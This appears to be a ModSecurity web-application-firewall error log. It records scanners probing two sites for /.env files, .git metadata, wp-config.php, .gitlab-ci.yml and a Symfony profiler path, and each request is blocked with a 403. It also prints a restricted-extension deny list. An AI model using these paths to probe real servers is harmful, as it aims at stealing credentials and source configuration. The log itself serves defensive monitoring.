[Thu Nov 06 00:49:24.667550 2025] [:error] [pid 4043130] [client 158.51.121.183:53924] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQvihHgbOp2T5WcLy2MQZgAAAAA"]
[Thu Nov 06 00:49:24.667721 2025] [:error] [pid 4043130] [client 158.51.121.183:53924] [client 158.51.121.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aQvihHgbOp2T5WcLy2MQZgAAAAA"]
[Thu Nov 06 05:14:37.970926 2025] [:error] [pid 4046157] [client 195.178.110.223:35346] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwgrY6_nbsqwaQSiZafzQAAAAc"]
[Thu Nov 06 05:14:37.971256 2025] [:error] [pid 4046157] [client 195.178.110.223:35346] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwgrY6_nbsqwaQSiZafzQAAAAc"]
[Thu Nov 06 05:14:37.971445 2025] [:error] [pid 4046157] [client 195.178.110.223:35346] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwgrY6_nbsqwaQSiZafzQAAAAc"]
[Thu Nov 06 05:35:59.223973 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3AAAAAk"]
[Thu Nov 06 05:35:59.224389 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3AAAAAk"]
[Thu Nov 06 05:35:59.224580 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3AAAAAk"]
[Thu Nov 06 05:35:59.389059 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwlr_VJG0cw-j-dvCZj3QAAAAk"]
[Thu Nov 06 05:35:59.389695 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwlr_VJG0cw-j-dvCZj3QAAAAk"]
[Thu Nov 06 05:35:59.389947 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQwlr_VJG0cw-j-dvCZj3QAAAAk"]
[Thu Nov 06 05:35:59.757509 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3gAAAAk"]
[Thu Nov 06 05:35:59.757895 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3gAAAAk"]
[Thu Nov 06 05:35:59.758082 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQwlr_VJG0cw-j-dvCZj3gAAAAk"]
[Thu Nov 06 05:36:00.089379 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj3wAAAAk"]
[Thu Nov 06 05:36:00.089805 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj3wAAAAk"]
[Thu Nov 06 05:36:00.090017 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj3wAAAAk"]
[Thu Nov 06 05:36:00.521679 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj4AAAAAk"]
[Thu Nov 06 05:36:00.522921 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj4AAAAAk"]
[Thu Nov 06 05:36:00.523143 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aQwlsPVJG0cw-j-dvCZj4AAAAAk"]
[Thu Nov 06 05:36:00.982842 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aQwlsPVJG0cw-j-dvCZj4QAAAAk"]
[Thu Nov 06 05:36:00.983028 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aQwlsPVJG0cw-j-dvCZj4QAAAAk"]
[Thu Nov 06 05:36:00.983407 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aQwlsPVJG0cw-j-dvCZj4QAAAAk"]
[Thu Nov 06 05:36:00.983640 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aQwlsPVJG0cw-j-dvCZj4QAAAAk"]
[Thu Nov 06 05:36:01.335114 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aQwlsfVJG0cw-j-dvCZj4gAAAAk"]
[Thu Nov 06 05:36:01.335519 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aQwlsfVJG0cw-j-dvCZj4gAAAAk"]
[Thu Nov 06 05:36:01.335716 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aQwlsfVJG0cw-j-dvCZj4gAAAAk"]
[Thu Nov 06 05:36:01.660522 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aQwlsfVJG0cw-j-dvCZj4wAAAAk"]
[Thu Nov 06 05:36:01.660975 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aQwlsfVJG0cw-j-dvCZj4wAAAAk"]
[Thu Nov 06 05:36:01.661174 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aQwlsfVJG0cw-j-dvCZj4wAAAAk"]
[Thu Nov 06 05:36:01.929342 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aQwlsfVJG0cw-j-dvCZj5AAAAAk"]
[Thu Nov 06 05:36:01.929732 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aQwlsfVJG0cw-j-dvCZj5AAAAAk"]
[Thu Nov 06 05:36:01.929926 2025] [:error] [pid 4046218] [client 195.178.110.201:49796] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aQwlsfVJG0cw-j-dvCZj5AAAAAk"]
[Thu Nov 06 08:54:38.966204 2025] [:error] [pid 4045867] [client 3.135.215.5:40410] [client 3.135.215.5] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxUPm-gTLuRxjagRbb00wAAAAE"]
[Thu Nov 06 08:54:38.966573 2025] [:error] [pid 4045867] [client 3.135.215.5:40410] [client 3.135.215.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxUPm-gTLuRxjagRbb00wAAAAE"]
[Thu Nov 06 08:54:38.966762 2025] [:error] [pid 4045867] [client 3.135.215.5:40410] [client 3.135.215.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxUPm-gTLuRxjagRbb00wAAAAE"]
[Thu Nov 06 09:32:37.771240 2025] [:error] [pid 4051135] [client 45.144.212.58:34292] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxdJdjXsYtO8NPzKc6GxwAAAAI"]
[Thu Nov 06 09:32:37.771492 2025] [:error] [pid 4051135] [client 45.144.212.58:34292] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxdJdjXsYtO8NPzKc6GxwAAAAI"]
[Thu Nov 06 09:32:37.771637 2025] [:error] [pid 4051135] [client 45.144.212.58:34292] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQxdJdjXsYtO8NPzKc6GxwAAAAI"]
[Thu Nov 06 18:04:58.501275 2025] [authz_core:error] [pid 4053627] [client 46.101.1.225:46148] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
